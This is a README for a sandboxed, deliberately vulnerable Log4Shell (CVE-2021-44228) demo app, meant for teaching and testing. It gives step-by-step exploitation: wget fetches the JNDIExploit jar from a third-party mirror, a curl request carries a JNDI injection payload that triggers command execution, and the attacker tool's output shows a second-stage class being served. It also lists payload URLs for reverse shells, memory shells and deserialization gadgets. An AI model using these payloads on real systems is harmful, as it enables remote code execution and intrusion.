126 lines
5.4 KiB
Markdown
126 lines
5.4 KiB
Markdown
# Log4Shell sample vulnerable application (CVE-2021-44228)
|
|
|
|
This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed [Log4Shell](https://www.lunasec.io/docs/blog/log4j-zero-day/).
|
|
|
|
It uses Log4j 2.14.1 (through `spring-boot-starter-log4j2` 2.6.1) and the JDK 1.8.0_181.
|
|
|
|

|
|
|
|
## Running the application
|
|
|
|
Run it:
|
|
|
|
```bash
|
|
docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929
|
|
```
|
|
|
|
## Exploitation steps
|
|
|
|
*Note: This is highly inspired from the original [LunaSec advisory](https://www.lunasec.io/docs/blog/log4j-zero-day/). **Run at your own risk, preferably in a VM in a sandbox environment**.*
|
|
|
|
**Update (Dec 13th)**: *The JNDIExploit repository has been removed from GitHub (presumably, [not by GitHub](https://twitter.com/_mph4/status/1470343429599211528))...
|
|
[Click Here](https://gitea.avc.cx/borekon/log4shell-vulnerable-app/raw/branch/main/JNDIExploit.v1.2.zip) to Download it
|
|
|
|
* Use [JNDIExploit](https://github.com/zzwlpx/JNDIExploit) to spin up a malicious LDAP server
|
|
|
|
```bash
|
|
wget https://gitea.avc.cx/borekon/log4shell-vulnerable-app/raw/branch/main/JNDIExploit.v1.2.zip
|
|
unzip JNDIExploit.v1.2.zip
|
|
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
|
|
```
|
|
|
|
* Then, trigger the exploit using:
|
|
|
|
```bash
|
|
# will execute 'touch /tmp/pwned'
|
|
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
|
|
```
|
|
|
|
* Notice the output of JNDIExploit, showing it has sent a malicious LDAP response and served the second-stage payload:
|
|
|
|
```
|
|
[+] LDAP Server Start Listening on 1389...
|
|
[+] HTTP Server Start Listening on 8888...
|
|
[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo
|
|
[+] Paylaod: command
|
|
[+] Command: touch /tmp/pwned
|
|
|
|
[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo with basic remote reference payload
|
|
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo redirecting to http://192.168.1.143:8888/Exploitjkk87OnvOH.class
|
|
[+] New HTTP Request From /192.168.1.143:50119 /Exploitjkk87OnvOH.class
|
|
[+] Receive ClassRequest: Exploitjkk87OnvOH.class
|
|
[+] Response Code: 200
|
|
```
|
|
|
|
* To confirm that the code execution was successful, notice that the file `/tmp/pwned.txt` was created in the container running the vulnerable application:
|
|
|
|
```
|
|
$ docker exec vulnerable-app ls /tmp
|
|
...
|
|
pwned
|
|
...
|
|
```
|
|
|
|
## Supported LDAP queries
|
|
|
|
All words are **case INSENSITIVE** when send to ldap server
|
|
```
|
|
[+] Basic Queries: ldap://127.0.0.1:1389/Basic/[PayloadType]/[Params], e.g.
|
|
ldap://127.0.0.1:1389/Basic/Dnslog/[domain]
|
|
ldap://127.0.0.1:1389/Basic/Command/[cmd]
|
|
ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]
|
|
ldap://127.0.0.1:1389/Basic/ReverseShell/[ip]/[port] ---windows NOT supported
|
|
ldap://127.0.0.1:1389/Basic/TomcatMemshell
|
|
ldap://127.0.0.1:1389/Basic/JettyMemshell
|
|
ldap://127.0.0.1:1389/Basic/WeblogicMemshell
|
|
ldap://127.0.0.1:1389/Basic/JBossMemshell
|
|
ldap://127.0.0.1:1389/Basic/WebsphereMemshell
|
|
ldap://127.0.0.1:1389/Basic/SpringMemshell
|
|
|
|
[+] Deserialize Queries: ldap://127.0.0.1:1389/Deserialize/[GadgetType]/[PayloadType]/[Params], e.g.
|
|
ldap://127.0.0.1:1389/Deserialize/URLDNS/[domain]
|
|
ldap://127.0.0.1:1389/Deserialize/CommonsCollections1/Dnslog/[domain]
|
|
ldap://127.0.0.1:1389/Deserialize/CommonsCollections2/Command/[cmd]
|
|
ldap://127.0.0.1:1389/Deserialize/CommonsBeanutils1/Command/Base64/[base64_encoded_cmd]
|
|
ldap://127.0.0.1:1389/Deserialize/C3P0/ReverseShell/[ip]/[port] ---windows NOT supported
|
|
ldap://127.0.0.1:1389/Deserialize/Jre8u20/TomcatMemshell ---ALSO support other memshells
|
|
|
|
[+] TomcatBypass Queries
|
|
ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[domain]
|
|
ldap://127.0.0.1:1389/TomcatBypass/Command/[cmd]
|
|
ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd]
|
|
ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port] ---windows NOT supported
|
|
ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell
|
|
ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell
|
|
|
|
[+] GroovyBypass Queries
|
|
ldap://127.0.0.1:1389/GroovyBypass/Command/[cmd]
|
|
ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd]
|
|
|
|
[+] WebsphereBypass Queries
|
|
ldap://127.0.0.1:1389/WebsphereBypass/List/file=[file or directory]
|
|
ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[domain]
|
|
ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/[cmd]
|
|
ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]
|
|
ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port] ---windows NOT supported
|
|
ldap://127.0.0.1:1389/WebsphereBypass/Upload/WebsphereMemshell
|
|
ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path] ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp
|
|
```
|
|
### base64 trick
|
|
|
|
You can convert from a command to base64 with this [online web](https://www.base64encode.org/)
|
|
|
|
**Note** that the `+`sign must be encoded has %2B. The following chart shows more posibilities:
|
|

|
|
|
|
|
|
## Reference
|
|
|
|
https://www.lunasec.io/docs/blog/log4j-zero-day/
|
|
https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/
|
|
|
|
## Contributors
|
|
|
|
[@christophetd](https://twitter.com/christophetd)
|
|
[@rayhan0x01](https://twitter.com/rayhan0x01)
|